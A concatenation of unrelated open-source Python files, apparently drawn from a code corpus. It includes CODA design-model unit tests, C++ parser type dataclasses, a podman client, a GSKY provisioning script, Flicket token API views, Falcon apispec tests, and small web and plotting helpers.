wheel.add_relationship(reqt, 'Tyre Diameter', 'min', 'strong', 26) wheel.add_relationship(reqt, 'Tyre Width', 'min', 'strong', 15) wheel.add_relationship(reqt, 'Spoke Thickness', 'min', 'moderate', 3.5) wheel.add_relationship(reqt, 'Use of Composites', 'max', 'strong', 0.3) reqt = 'Manufacturability' wheel.add_relationship(reqt, 'Tyre Width', 'max', 'weak', 12) wheel.add_relationship(reqt, 'Spoke Thickness', 'max', 'moderate', 2.9) wheel.add_relationship(reqt, 'Use of Composites', 'min', 'strong', 0.5) reqt = 'Repairability' wheel.add_relationship(reqt, 'Tyre Width', 'max', 'weak', 14) wheel.add_relationship(reqt, 'Spoke Thickness', 'max', 'moderate', 3.8) wheel.add_relationship(reqt, 'Use of Composites', 'min', 'strong', 0.25) def test_merit(self): self.assertAlmostEqual(self.wheel.merit, .5788, places=4) def test_sum_of_correlations(self): """Sum of correlation factors for all requirements.""" np.testing.assert_array_almost_equal( self.wheel.correlation.sum(axis=1, keepdims=True), np.array([[2.4, 1.2, 3.0, 1.3, 1.3]]).T ) def test_read_excel(self): try: import pandas import xlrd except ImportError: self.skipTest("`pandas` and `xlrd` required for " "spreadsheet parsing") model = models.CODA.read_excel( os.path.join(DATA_DIR, 'demo_model_casestudy1.xlsx') ) for char, ref in zip(model.characteristics, self.wheel.characteristics): char.value = ref.value self.assertEqual(self.wheel.merit, model.merit) @ddt class TestCODACharacteristic(unittest.TestCase): def setUp(self): class CODACharacteristic(models.CODACharacteristic): def __init__(self): pass self.inst = CODACharacteristic() def test___init____omit_value(self): """Omitting the value on instantiation is valid. When modelling a set of designs (typical) we don't necessarily want to seed the model with characteristic values. """ inst = models.CODACharacteristic('Name') # This might want to be None? Requires everything supporting # that as an input though. self.assertRaises(AttributeError, getattr, inst, 'value') @data( (-0.01, ValueError), (0.0, None), (0.5, None), (1.0, None), (1.01, ValueError), ) @unpack def test_value__set_with_default_limits(self, value, exception): if exception is not None: self.assertRaises(exception, setattr, self.inst, 'value', value) else: self.inst.value = value self.assertEqual(self.inst.value, value) def test_limits__get__default(self): self.assertEqual(self.inst.limits, self.inst._default_limits) @data((0.0, 1.0), [0.0, 1.0], (None, None), (0, None), (None, 1)) def test_limits__set__valid(self, value): self.inst.limits = value self.assertEqual(self.inst.limits, tuple(value)) @ddt class TestCODARequirement(unittest.TestCase): def setUp(self): class CODARequirement(models.CODARequirement): def __init__(self): pass self.inst = CODARequirement() @data((-0.01, False), (0.0, True), (0.5, True), (1.0, True), (1.1, False)) @unpack def test_weight__set(self, wt, valid): # Prototypes used context to allow weights to be provided in a # non-normalised form and this property would handle the # normalisation by inspecting the weights of other # requirements. This functionality isn't implemented here, but # might still be useful. if not valid: self.assertRaises(ValueError, setattr, self.inst, 'weight', wt) else: self.inst.weight = wt self.assertEqual(self.inst.weight, wt) @ddt class TestCODARelationship(unittest.TestCase): def setUp(self): class Concrete(models.CODARelationship): def __init__(self): pass def __call__(self, x): return 0.0 self.cls = Concrete self.inst = Concrete() @data([0.0, 0.0, True], [0.1, 0.1, True], [0.3, 0.3, True], [0.9, 0.9, True], [1.0, 0.1, True], [0.25, None, False], [-0.1, None, False], [0, 0.0, True], [1, 0.1, True], [3, 0.3, True], [9, 0.9, True], ['none', 0.0, True], [None, 0.0, True], ['weak', 0.1, True], ['moderate', 0.3, True], ['medium', 0.3, True], ['strong', 0.9, True], ['---', 0.9, True], ['+++', 0.9, True], ['ooo', 0.9, True], ['--', 0.3, True], ['++', 0.3, True], ['oo', 0.3, True], ['o', 0.1, True], ['o', 0.1, True], ['o', 0.1, True], ) @unpack def test_correlation(self, value, internal_value, valid): """Correlation value must be one of a restricted set.""" # TODO: It might be more flexible to enforce this further up # for different scaling systems. Could also be done with # a mixin implementation implementation self.assertRaises(AttributeError, getattr, self.inst, 'correlation') if valid: self.inst.correlation = value self.assertEqual(self.inst.correlation, internal_value) else: self.assertRaises(ValueError, setattr, self.inst, 'correlation', value) def test_target(self): """Target value may be anything, but check it's settable.""" self.assertRaises(AttributeError, getattr, self.inst, 'target') self.inst.target = 0.0 self.assertEqual(self.inst.target, 0.0) class TestCODANull(unittest.TestCase): def test___init__(self): """Takes no arguments, has a correlation and merit of zero.""" null = models.CODANull() self.assertEqual(null.correlation, 0.0) self.assertIs(null.target, None) self.assertEqual(null(None), 0.0) def test__attributes_not_settable(self): null = models.CODANull() self.assertRaises(TypeError, setattr, null, 'correlation', 1) self.assertRaises(TypeError, setattr, null, 'target', 1) class TestCODAMaximise(unittest.TestCase): # TODO: compare function over range. def test_merit(self): inst = models.CODAMaximise(target=1.0, correlation=None) self.assertAlmostEqual(inst(1.0), 0.5) self.assertLess(inst(0.1), 0.5) self.assertGreater(inst(2.0), 0.5) class TestCODAMinimise(unittest.TestCase): # TODO: compare function over range. def test_merit(self): inst = models.CODAMinimise(target=1.0, correlation=None) self.assertAlmostEqual(inst(1.0), 0.5) self.assertGreater(inst(0.1), 0.5) self.assertLess(inst(2.0), 0.5) class TestCODAOptimise(unittest.TestCase): # TODO: compare function over range. def test_merit(self): inst = models.CODAOptimise(target=1.0, correlation=None, tolerance=0.2) self.assertAlmostEqual(inst(0.8), 0.5) self.assertAlmostEqual(inst(1.2), 0.5) self.assertAlmostEqual(inst(1.0), 1.0) self.assertGreater(inst(1.1), 0.5) self.assertGreater(inst(0.9), 0.5) self.assertLess(inst(2.0), 0.5) self.assertLess(inst(0.0), 0.5) if __name__ == '__main__': unittest.main() dasbaumwolltier/journald-monitorjournald_monitor/__init__.py from .journald_monitor import JournaldMonitor michelp/cxxheaderparser import typing from dataclasses import dataclass, field @dataclass class Token: """ In an ideal world, this Token class would not be exposed via the user visible API. Unfortunately, getting to that point would take a significant amount of effort. It is not expected that these will change, but they might. At the moment, the only supported use of Token objects are in conjunction with the ``tokfmt`` function. As this library matures, we'll try to clarify the expectations around these. File an issue on github if you have ideas! """ #: Raw value of the token value: str #: Lex type of the token type: str = field(repr=False, compare=False, default="") @dataclass class Value: """ A unparsed list of tokens .. code-block:: c++ int x = 0x1337; ~~~~~~ """ #: Tokens corresponding to the value tokens: typing.List[Token] @dataclass class NamespaceDecl: """ Namespace declarations .. code-block:: c++ namespace foo::bar {} ~~~~~~~~ """ #: These are the names (split by ::) for this namespace declaration, #: but does not include any parent namespace names #: #: An anonymous namespace is an empty list names: typing.List[str] inline: bool = False @dataclass class DecltypeSpecifier: """ Contents of a decltype (inside the parentheses) .. code-block:: c++ decltype(Foo::Bar) ~~~~~~~~ """ #: Unparsed tokens within the decltype tokens: typing.List[Token] @dataclass class FundamentalSpecifier: """ A specifier that only contains fundamental types """ name: str @dataclass class NameSpecifier: """ An individual segment of a type name .. code-block:: c++ Foo::Bar ~~~ """ name: str specialization: typing.Optional["TemplateSpecialization"] = None @dataclass class AutoSpecifier: """ Used for an auto return type """ name: str = "auto" @dataclass class AnonymousName: """ A name for an anonymous class, such as in a typedef. There is no string associated with this name, only an integer id. Things that share the same anonymous name have anonymous name instances with the same id """ #: Unique id associated with this name (only unique per parser instance!) id: int PQNameSegment = typing.Union[ AnonymousName, FundamentalSpecifier, NameSpecifier, DecltypeSpecifier, AutoSpecifier ] @dataclass class PQName: """ Possibly qualified name of a C++ type. """ #: All of the segments of the name. This is always guaranteed to have at #: least one element in it. Name is segmented by '::' #: #: If a name refers to the global namespace, the first segment will be an #: empty NameSpecifier segments: typing.List[PQNameSegment] #: Set if the name starts with class/enum/struct classkey: typing.Optional[str] = None #: Set to true if the type was preceded with 'typename' has_typename: bool = False @dataclass class Enumerator: """ An individual value of an enumeration """ #: The enumerator key name name: str #: None if not explicitly specified value: typing.Optional[Value] = None #: Documentation if present doxygen: typing.Optional[str] = None @dataclass class EnumDecl: """ An enumeration type """ typename: PQName values: typing.List[Enumerator] base: typing.Optional[PQName] = None #: Documentation if present doxygen: typing.Optional[str] = None #: If within a class, the access level for this decl access: typing.Optional[str] = None @dataclass class TemplateArgument: """ A single argument for a template specialization .. code-block:: c++ Foo ~~~ """ #: If this argument is a type, it is stored here as a DecoratedType, #: otherwise it's stored as an unparsed set of values arg: typing.Union["DecoratedType", Value] param_pack: bool = False @dataclass class TemplateSpecialization: """ Contains the arguments of a template specialization .. code-block:: c++ Foo ~~~~~~~~~~~ """ args: typing.List[TemplateArgument] @dataclass class FunctionType: """ A function type, currently only used in a function pointer .. note:: There can only be one of FunctionType or Type in a DecoratedType chain """ return_type: "DecoratedType" parameters: typing.List["Parameter"] #: If a member function pointer # TODO classname: typing.Optional[PQName] #: Set to True if ends with ``...`` vararg: bool = False #: True if function has a trailing return type (``auto foo() -> int``). #: In this case, the 'auto' return type is removed and replaced with #: whatever the trailing return type was has_trailing_return: bool = False @dataclass class Type: """ A type with a name associated with it """ typename: PQName const: bool = False volatile: bool = False @dataclass class Array: """ Information about an array. Multidimensional arrays are represented as an array of array. """ #: The type that this is an array of array_of: typing.Union["Array", "Pointer", Type] #: Size of the array #: #: .. code-block:: c++ #: #: int x[10]; #: ~~ size: typing.Optional[Value] @dataclass class Pointer: """ A pointer """ #: Thing that this points to ptr_to: typing.Union[Array, FunctionType, "Pointer", Type] const: bool = False volatile: bool = False @dataclass class Reference: """ A lvalue (``&``) reference """ ref_to: typing.Union[Array, Pointer, Type] @dataclass class MoveReference: """ An rvalue (``&&``) reference """ moveref_to: typing.Union[Array, Pointer, Type] #: A type or function type that is decorated with various things #: #: .. note:: There can only be one of FunctionType or Type in a DecoratedType #: chain DecoratedType = typing.Union[Array, Pointer, MoveReference, Reference, Type] @dataclass class TemplateNonTypeParam: """ .. code-block:: c++ template ~~~~~ template ~~~~~~~~~~~~~~~~~~~ template ~~~~~~ """ type: DecoratedType name: typing.Optional[str] = None default: typing.Optional[Value] = None #: Contains a ``...`` param_pack: bool = False @dataclass class TemplateTypeParam: """ .. code-block:: c++ template ~~~~~~~~~~ """ #: 'typename' or 'class' typekey: str name: typing.Optional[str] = None param_pack: bool = False default: typing.Optional[Value] = None #: A template-template param template: typing.Optional["TemplateDecl"] = None #: A parameter for a template declaration #: #: .. code-block:: c++ #: #: template #: ~~~~~~~~~~ TemplateParam = typing.Union[TemplateNonTypeParam, TemplateTypeParam] @dataclass class TemplateDecl: """ Template declaration for a function or class .. code-block:: c++ template class Foo {}; template T fn(); """ params: typing.List[TemplateParam] = field(default_factory=list) @dataclass class ForwardDecl: """ Represents a forward declaration of a user defined type """ typename: PQName template: typing.Optional[TemplateDecl] = None doxygen: typing.Optional[str] = None #: Set if this is a forward declaration of an enum and it has a base enum_base: typing.Optional[PQName] = None #: If within a class, the access level for this decl access: typing.Optional[str] = None @dataclass class BaseClass: """ Base class declarations for a class """ #: access specifier for this base access: str #: possibly qualified type name for the base typename: PQName #: Virtual inheritance virtual: bool = False #: Contains a ``...`` param_pack: bool = False @dataclass class ClassDecl: """ A class is a user defined type (class/struct/union) """ typename: PQName bases: typing.List[BaseClass] = field(default_factory=list) template: typing.Optional[TemplateDecl] = None explicit: bool = False final: bool = False doxygen: typing.Optional[str] = None #: If within a class, the access level for this decl access: typing.Optional[str] = None @property def classkey(self) -> typing.Optional[str]: return self.typename.classkey @dataclass class Parameter: """ A parameter of a function/method """ type: DecoratedType name: typing.Optional[str] = None default: typing.Optional[Value] = None param_pack: bool = False @dataclass class Function: """ A function declaration, potentially with the function body """ return_type: DecoratedType name: PQName parameters: typing.List[Parameter] #: Set to True if ends with ``...`` vararg: bool = False doxygen: typing.Optional[str] = None constexpr: bool = False extern: typing.Union[bool, str] = False static: bool = False inline: bool = False #: If true, the body of the function is present has_body: bool = False #: True if function has a trailing return type (``auto foo() -> int``). #: In this case, the 'auto' return type is removed and replaced with #: whatever the trailing return type was has_trailing_return: bool = False template: typing.Optional[TemplateDecl] = None throw: typing.Optional[Value] = None noexcept: typing.Optional[Value] = None @dataclass class Method(Function): """ A method declaration, potentially with the method body """ #: constructors and destructors don't have a return type return_type: typing.Optional[DecoratedType] access: str = "" const: bool = False volatile: bool = False #: ref-qualifier for this method, either lvalue (&) or rvalue (&&) #: #: .. code-block:: c++ #: #: void foo() &&; #: ~~ #: ref_qualifier: typing.Optional[str] = None constructor: bool = False explicit: bool = False default: bool = False deleted: bool = False destructor: bool = False pure_virtual: bool = False virtual: bool = False final: bool = False override: bool = False @dataclass class Operator(Method): operator: str = "" @dataclass class FriendDecl: """ Represents a friend declaration -- friends can only be classes or functions """ cls: typing.Optional[ForwardDecl] = None fn: typing.Optional[Function] = None @dataclass class Typedef: """ A typedef specifier. A unique typedef specifier is created for each alias created by the typedef. .. code-block:: c++ typedef type name, *pname; """ #: The aliased type #: #: .. code-block:: c++ #: #: typedef type *pname; #: ~~~~~~ type: DecoratedType #: The alias introduced for the specified type #: #: .. code-block:: c++ #: #: typedef type *pname; #: ~~~~~ name: str #: If within a class, the access level for this decl access: typing.Optional[str] = None @dataclass class Variable: """ A variable declaration """ name: PQName type: DecoratedType value: typing.Optional[Value] = None constexpr: bool = False extern: typing.Union[bool, str] = False static: bool = False inline: bool = False #: Can occur for a static variable for a templated class template: typing.Optional[TemplateDecl] = None doxygen: typing.Optional[str] = None @dataclass class Field: """ A field of a class """ #: public/private/protected access: str type: DecoratedType name: typing.Optional[str] = None value: typing.Optional[Value] = None bits: typing.Optional[int] = None constexpr: bool = False mutable: bool = False static: bool = False doxygen: typing.Optional[str] = None @dataclass class UsingDecl: """ .. code-block:: c++ using NS::ClassName; """ typename: PQName #: If within a class, the access level for this decl access: typing.Optional[str] = None @dataclass class UsingAlias: """ .. code-block:: c++ using foo = int; template using VectorT = std::vector; """ alias: str type: DecoratedType template: typing.Optional[TemplateDecl] = None #: If within a class, the access level for this decl access: typing.Optional[str] = None gtmanfred/teststack """ Client for interfacing with podman. To enable using podman as the container interface, specify the following section in the ``teststack.toml`` .. code-block:: toml [client] name = "podman" There is an extra provided to install the ``podman`` dependency. .. code-block:: shell python3 -m pip install teststack[podman] """ import json import os import platform import subprocess import click import podman.errors class Client: def __init__(self, machine_name=None, **kwargs): if machine_name is not None: kws = self._get_connection(machine_name) kws.update(kwargs) elif platform.system() == 'Darwin': kws = self._get_connection('*') kws.update(kwargs) else: kws = kwargs if kws: self.client = podman.PodmanClient(**kws) else: self.client = podman.from_env() def _get_connection(self, name): connections = json.loads( subprocess.check_output( [ 'podman', 'system', 'connection', 'list', '--format=json', ] ), ) for connection in connections: if connection['Name'].endswith(name): return { 'base_url': f'http+{connection["URI"]}', 'identity': connection['Identity'], } return {} def __del__(self): self.client.close() def end_container(self, name): try: container = self.client.containers.get(name) except podman.errors.NotFound: return try: container.stop() container.wait() except podman.errors.APIError: pass finally: container.remove(v=True) def container_get(self, name): try: return self.client.containers.get(name).id except podman.errors.NotFound: return None def container_get_current_image(self, name): container = self.container_get(name) if container: return self.client.containers.get(container).image.id return None def run( self, name, image, ports=None, command=None, environment=None, stream=False, user=None, volumes=None, mount_cwd=False, ): mounts = volumes or [] if mount_cwd is True: mounts.append( { 'Source': os.getcwd(), 'Destination': self.client.images.get(image).attrs['Config']['WorkingDir'], 'Mode': 'rw', } ) if command is True: command = ['/bin/tail', '-f', '/dev/null'] if ports: for port, hostport in ports.items(): if not hostport: ports[port] = None if not self.image_get(image): self.client.images.pull(image) container = self.client.containers.create( name=name, image=image, detach=True, stream=stream, ports=ports or {}, environment=environment or {}, command=command, mounts=mounts, ) container.start() container.wait(condition="running") return container.id def start(self, name): self.client.containers.get(name=name).start() def image_get(self, tag): try: return self.client.images.get(tag).id except podman.errors.ImageNotFound: return None def run_command(self, container, command): container = self.client.containers.get(container) click.echo(click.style(f'Run Command: {command}', fg='green')) socket = container.exec_run( cmd=command, tty=True, socket=True, ) for line in socket.output: click.echo(line, nl=False) def build(self, dockerfile, tag, rebuild): image, _ = self.client.images.build(path='.', dockerfile=dockerfile, tag=tag, nocache=rebuild, rm=True) return image.id def get_container_data(self, name, inside=False): data = {} try: container = self.client.containers.get(name) except podman.errors.NotFound: return None data['HOST'] = container.attrs['NetworkSettings']['IPAddress'] if inside else 'localhost' for port, port_data in container.attrs['NetworkSettings']['Ports'].items(): if inside: data[f'PORT;{port}'] = port.split('/')[0] elif port_data: data[f'PORT;{port}'] = port_data[0]['HostPort'] return data def exec(self, container): os.execvp('podman', ['podman', 'exec', '-ti', container, 'bash']) gsky_provisioning/provision_multi_node.py import argparse import os import requests import socket import time import env_configs as cfg from mas import MAS from ows import OWS from worker import Worker from gsky_config import GSKYConfig curr_path = os.path.dirname(os.path.realpath(__file__)) gsky_conf_dir = os.path.join(curr_path, 'test_data/gsky_conf') if not os.path.exists(gsky_conf_dir): os.makedirs(gsky_conf_dir) envs = cfg.Environment( # bin_prefix 'gsky' is the default path generated by build_gsky.py bin_prefix=os.path.join(curr_path, 'gsky'), # pg_data_prefix is the path for postgres database files. pg_data_prefix=os.path.join(curr_path, 'test_data/pg_data'), # gsky_conf_prefix is where the GSKY config.json locates. gsky_conf_prefix=gsky_conf_dir, # Unsetting or setting GSKY_GRPC_POOL_SIZE to non-positive value will be defaulted to number of cores. # Here we set it to 2 for testing purpose. GSKY_GRPC_POOL_SIZE=2, ) # test crawl file to be ingested into mas #crawl_files = ['/g/data/cm85/export/published/gsky-prod/wx7-aster.gz',] crawl_files = ['/short/z00/avs900/aster_crawls/aster-gdal-gsky-1.2.2.tsv.gz',] # Same file as above. Working # test wms url url = '%s/ows?time=2012-06-01T00:A00:A00.000Z&srs=EPSG:3857&service=WMS&version=1.1.1&request=GetMap&layers=False_Colour&bbox=13149614.84995544,-3443946.7464169003,13462700.917811524,-3130860.6785608195&width=256&height=256' % envs.envs['GSKY_OWS_HOSTNAME'] ###################################################################################### # The above code sets up the basic environment for testing purposes. # The test data including postgres data files and gsky config.json will be # written to test_data under current directory. # # The following code performs provisioning by bringing up mas, ows and workers. ###################################################################################### parser = argparse.ArgumentParser() parser.add_argument('--job_dir', default='~/gsky_dist_jobs') parser.add_argument('--services', default='ows,mas,worker') parser.add_argument('--n_workers', type=int, default=1) args = parser.parse_args() job_dir = os.path.abspath(os.path.expanduser(args.job_dir)) if not os.path.exists(job_dir): raise Exception('%s does not exist or is not accessible' % job_dir) services = [srv.strip() for srv in args.services.split(',') if len(srv.strip()) > 0] valid_services = ['ows', 'mas', 'worker'] for srv in services: if srv not in valid_services: raise Exception('invalid services: %s' % str(services)) hostname = socket.gethostname() shutdown_file = os.path.join(job_dir, 'shutdown') worker_file = os.path.join(job_dir, 'worker_%s' % hostname) mas_file = os.path.join(job_dir, 'mas_%s' % hostname) try: if 'worker' in services: worker = Worker(envs=envs.envs) worker.start() open(worker_file, 'w').close() if 'mas' in services: mas = MAS(envs=envs.envs, mode='r') mas.start() mas.ingest_data(crawl_files) open(mas_file, 'w').close() if 'ows' in services: ows = OWS(envs=envs.envs) mas_port = envs.envs['GSKY_MASAPI_PORT'] worker_port = envs.envs['GSKY_GRPC_PORT'] server_conf={ 'service_config':{ 'ows_hostname': '', 'mas_address': '', 'worker_nodes': [], }, } while True: files = [f for f in os.listdir(job_dir) if os.path.isfile(os.path.join(job_dir, f))] for f in files: if f.startswith('mas_'): mas_host = f[len('mas_'):] mas_hostname = '%s:%s' % (mas_host, mas_port) server_conf['service_config']['mas_address'] = mas_hostname if f.startswith('worker_'): worker_host = f[len('worker_'):] worker_hostname = '%s:%s' % (worker_host, worker_port) if worker_hostname not in server_conf['service_config']['worker_nodes']: server_conf['service_config']['worker_nodes'].append(worker_hostname) if len(server_conf['service_config']['worker_nodes']) >= args.n_workers: break time.sleep(3) conf = GSKYConfig(init_conf=server_conf, envs=envs.envs) conf_json = conf.get_config_json(conf_file=os.path.join(curr_path, 'assets/gsky_layers/aster.yaml')) with open(os.path.join(gsky_conf_dir, 'config.json'), 'w') as f: f.write(conf_json) ows.start() t0 = time.time() res = requests.get(url) t = time.time() - t0 if res.status_code == 200: with open('test_wms.png', 'wb') as f: f.write(res.content) print('%s -> test_wms.png (%.3f secs)' % (url, t)) else: raise Exception(res.text) if 'ows' not in services and ('worker' in services or 'mas' in services): while True: if os.path.exists(shutdown_file): break time.sleep(3) finally: if 'ows' in services: ows.stop() open(shutdown_file, 'w').close() if 'mas' in services: mas.stop() if 'worker' in services: worker.stop() #! python3 # -*- coding: utf-8 -*- # # Flicket - copyright : """ Authentication / Tokens ======================= Get Token ~~~~~~~~~ The user will need to provide their username and password to retrieve an authentictaion token. The authentication token is required to access all other parts of the API. .. code-block:: # example using httpie http --auth : POST http://localhost:5000/flicket-api/tokens **Response** .. sourcecode:: http HTTP/1.0 200 OK Content-Length: 50 Content-Type: application/json Date: Sat, 29 Sep 2018 14:01:00 GMT Server: Werkzeug/0.14.1 Python/3.6.5 { "token": "" } Delete Token ~~~~~~~~~~~~ .. code-block:: # example using httpie http DELETE http://localhost:5000/flicket-api/tokens "Authorization: Bearer " **Responds** .. sourcecode:: http HTTP/1.0 204 NO CONTENT Content-Length: 0 Content-Type: text/html; charset=utf-8 Date: Sat, 29 Sep 2018 14:13:19 GMT Server: Werkzeug/0.14.1 Python/3.6.5 """ from flask import g, jsonify from .sphinx_helper import api_url from . import bp_api from application import app, db from application.flicket_api.views.auth import basic_auth, token_auth @bp_api.route(api_url + 'tokens', methods=['POST']) @basic_auth.login_required def get_token(): token = g.current_user.get_token() db.session.commit() return jsonify({'token': token}) @bp_api.route(api_url + 'tokens', methods=['DELETE']) @token_auth.login_required def revoke_token(): g.current_user.revoke_token() db.session.commit() return '', 204 import unittest import sys sys.path.append('../../cocytus') import cocytus as cqt ini_path = 'cocytus/ini/' class InifileTest(unittest.TestCase): def test_normal(self): config = cqt.open_inifile(ini_path + 'ok.ini') self.assertTrue(cqt.check_config(config)) def test_err(self): config = cqt.open_inifile(ini_path + 'err0.ini') self.assertFalse(cqt.check_config(config)) config = cqt.open_inifile(ini_path + 'err1.ini') self.assertFalse(cqt.check_config(config)) if __name__ == '__main__': unittest.main() # -*- coding: utf-8 -*- from benedict.core import clone def filter(d, predicate): if not callable(predicate): raise ValueError('predicate argument must be a callable.') new_dict = clone(d, empty=True) keys = list(d.keys()) for key in keys: value = d.get(key, None) if predicate(key, value): new_dict[key] = value return new_dict import falcon import pytest from apispec import APISpec from apispec.exceptions import APISpecError from unittest.mock import MagicMock from falcon_apispec import FalconPlugin @pytest.fixture def suffixed_resource(): class SuffixedResource: def on_get_hello(self): """A greeting endpoint. --- description: get a greeting responses: 200: description: said hi """ return "dummy_hello" def on_get(self): """An invalid method. --- description: get something responses: 200: description: said ??? """ return "dummy" return SuffixedResource() @pytest.fixture() def spec_factory(): def _spec(app): return APISpec( title="Swagger Petstore", version="1.0.0", openapi_version="3.0.2", description="This is a sample Petstore server. You can find out " 'more about Swagger at ' "http://swagger.wordnik.com or on irc.freenode.net, #swagger." 'For this sample, you can use the api key "special-key" to test ' "the authorization filters", plugins=[FalconPlugin(app)], ) return _spec @pytest.fixture() def app(): falcon_app = falcon.API() return falcon_app class TestPathHelpers: def test_gettable_resource(self, app, spec_factory): class HelloResource: def on_get(self, req, resp): """A greeting endpoint. --- description: get a greeting responses: 200: description: said hi """ return "dummy" expected = { "description": "get a greeting", "responses": {"200": {"description": "said hi"}}, } hello_resource = HelloResource() app.add_route("/hi", hello_resource) spec = spec_factory(app) spec.path(resource=hello_resource) assert spec._paths["/hi"]["get"] == expected def test_posttable_resource(self, app, spec_factory): class HelloResource: def on_post(self, req, resp): """A greeting endpoint. --- description: get a greeting responses: 201: description: posted something """ return "hi" expected = { "description": "get a greeting", "responses": {"201": {"description": "posted something"}}, } hello_resource = HelloResource() app.add_route("/hi", hello_resource) spec = spec_factory(app) spec.path(resource=hello_resource) assert spec._paths["/hi"]["post"] == expected def test_resource_with_metadata(self, app, spec_factory): class HelloResource: """Greeting API. --- x-extension: global metadata """ hello_resource = HelloResource() app.add_route("/hi", hello_resource) spec = spec_factory(app) spec.path(resource=hello_resource) assert spec._paths["/hi"]["x-extension"] == "global metadata" def test_resource_no_methods(self, app, spec_factory): class HelloResource: """Greeting API. --- x-extension: global metadata """ hello_resource = HelloResource() magic_route = MagicMock(uri_template="/hi", resource=hello_resource, method_map=[]) app._router._roots.append(magic_route) spec = spec_factory(app) spec.path(resource=hello_resource) assert spec._paths["/hi"]["x-extension"] == "global metadata" def test_unredundant_basepath_resource_with_slash(self, app, spec_factory): class HelloResource: def on_get(self, req, resp): """A greeting endpoint. --- description: get a greeting responses: 200: description: said hi """ return "dummy" expected = { "description": "get a greeting", "responses": {"200": {"description": "said hi"}}, } hello_resource = HelloResource() app.add_route("/v1/foo/v1", hello_resource) spec = spec_factory(app) base_path = '/v1' spec.path(resource=hello_resource, base_path=base_path) assert spec._paths["/foo/v1"]["get"] == expected def test_unredundant_basepath_resource_wo_slash(self, app, spec_factory): class HelloResource: def on_get(self, req, resp): """A greeting endpoint. --- description: get a greeting responses: 200: description: said hi """ return "dummy" expected = { "description": "get a greeting", "responses": {"200": {"description": "said hi"}}, } hello_resource = HelloResource() app.add_route("/v1/foo/v1", hello_resource) spec = spec_factory(app) base_path = 'v1' spec.path(resource=hello_resource, base_path=base_path) assert spec._paths["/foo/v1"]["get"] == expected def test_path_with_suffix(self, app, spec_factory, suffixed_resource): expected = { "description": "get a greeting", "responses": {"200": {"description": "said hi"}}, } app.add_route("/hi", suffixed_resource, suffix="hello") spec = spec_factory(app) spec.path(resource=suffixed_resource, suffix="hello") assert spec._paths["/hi"]["get"] == expected def test_path_ignore_suffix(self, app, spec_factory, suffixed_resource): expected = { "description": "get something", "responses": {"200": {"description": "said ???"}}, } app.add_route("/say", suffixed_resource) spec = spec_factory(app) spec.path(resource=suffixed_resource) assert spec._paths["/say"]["get"] == expected def test_path_suffix_all(self, app, spec_factory, suffixed_resource): app.add_route("/say", suffixed_resource) app.add_route("/say/hi", suffixed_resource, suffix="hello") spec = spec_factory(app) spec.path(resource=suffixed_resource) spec.path(resource=suffixed_resource, suffix="hello") assert spec._paths["/say"]["get"]["description"] == "get something" assert spec._paths["/say/hi"]["get"]["description"] == "get a greeting" def test_path_multiple_routes_same_resource(self, app, spec_factory): class HelloResource: """Greeting API. --- x-extension: global metadata """ hello_resource = HelloResource() app.add_route("/hi", hello_resource) app.add_route("/greet", hello_resource) spec = spec_factory(app) spec.path(resource=hello_resource) assert spec._paths["/hi"]["x-extension"] == "global metadata" with pytest.raises(KeyError): # Limitation: one route will not be documented!!! assert spec._paths["/greet"]["x-extension"] == "global metadata" def test_resource_without_endpoint(self, app, spec_factory): class HelloResource: def on_get(self, req, resp): """A greeting endpoint. --- description: get a greeting responses: 200: description: said hi """ return "dummy" hello_resource = HelloResource() spec = spec_factory(app) with pytest.raises(APISpecError): spec.path(resource=hello_resource) """ Leetcode No: 242 Title: Valid Anagram Description: Given two strings s and t, return true if t is an anagram of s, and false otherwise. An Anagram is a word or phrase formed by rearranging the letters of a different word or phrase, typically using all the original letters exactly once. Example 1: Input: s = "anagram", t = "nagaram" Output: true Example 2: Input: s = "rat", t = "car" Output: false """ class Solution: def is_anagram(self, s: str, t: str) -> bool: if len(s) != len(t): return False return sorted(s) == sorted(t) JonathanHuot/cellarpycellar/web.py0 # -*- coding: utf-8 -*- from bottle import response from bottle import template from bottle import MakoTemplate from bottle import CheetahTemplate from bottle import Jinja2Template import functools import logging def guess_type(filename, headers): ''' Try to guess Content-Encoding/Content-Type, and set it to current response ''' import mimetypes charset = 'UTF-8' mimetype, encoding = mimetypes.guess_type(filename) if not mimetype and filename.find(".woff2"): mimetype, encoding = mimetypes.guess_type(filename + ".woff") if encoding: headers['Content-Encoding'] = encoding if mimetype: if mimetype[:5] == 'text/' and charset and 'charset' not in mimetype: mimetype += '; charset=%s' % charset headers['Content-Type'] = mimetype def static_file(filename, root, *args, **kwargs): ''' Revised version of bottle static_file changelog: add support for woff2 extension ''' from bottle import static_file as bottle_static_file resp = bottle_static_file(filename, root, *args, **kwargs) if "Content-Type" not in response.headers: guess_type(filename, resp.headers) return resp def generate_less_from_css(filename, root, cache=None): from subprocess import call from cellar import fs from os import path css_cache = path.join(cache, filename) less_file = path.join(root, filename.replace(".css", ".less")) if not fs.static_file_exists(cache, filename) or \ path.getmtime(less_file) > path.getmtime(css_cache): logging.debug("Cache version of {0} doesn't exist or is outdated.".format(css_cache)) with open(css_cache, 'w') as fd: logging.debug("Write lessc output for {0} to {1}".format(less_file, css_cache)) call(["lessc", less_file], stdout=fd) return static_file(filename, root=cache) def generate_static_file(filename, root, *args, **kwargs): ''' Merged static_file and template bottle functions. Can generate dynamic content in css or js file. e.g. very useful to generate path or size dynamically. If you want jinja2 instead of SimpleTemplate, you can use: from web import jinja2_static_file as generate_static_file ''' from cellar import fs if fs.static_file_exists(root, filename): return static_file(filename, root=root) guess_type(filename, response.headers) return template(filename, *args, **kwargs) mako_static_file = functools.partial(generate_static_file, template_adapter=MakoTemplate) cheetah_static_file = functools.partial(generate_static_file, template_adapter=CheetahTemplate) jinja2_static_file = functools.partial(generate_static_file, template_adapter=Jinja2Template) 0 import numpy as np from matplotlib import colors import matplotlib.pyplot as plt import mesostat.visualization.mpl_colorbar as mpl_colorbar def imshow(fig, ax, data, xlabel=None, ylabel=None, title=None, haveColorBar=False, limits=None, extent=None, xTicks=None, yTicks=None, haveTicks=False, cmap=None, aspect='auto', fontsize=20): img = ax.imshow(data, cmap=cmap, extent=extent, aspect=aspect) if xlabel is not None: ax.set_xlabel(xlabel, fontsize=fontsize) if ylabel is not None: ax.set_ylabel(ylabel, fontsize=fontsize) if title is not None: ax.set_title(title, fontsize=fontsize) if haveColorBar: mpl_colorbar.imshow_add_color_bar(fig, ax, img) if not haveTicks: ax.axes.xaxis.set_ticks([]) ax.axes.yaxis.set_ticks([]) # ax.axis('off') if limits is not None: norm = 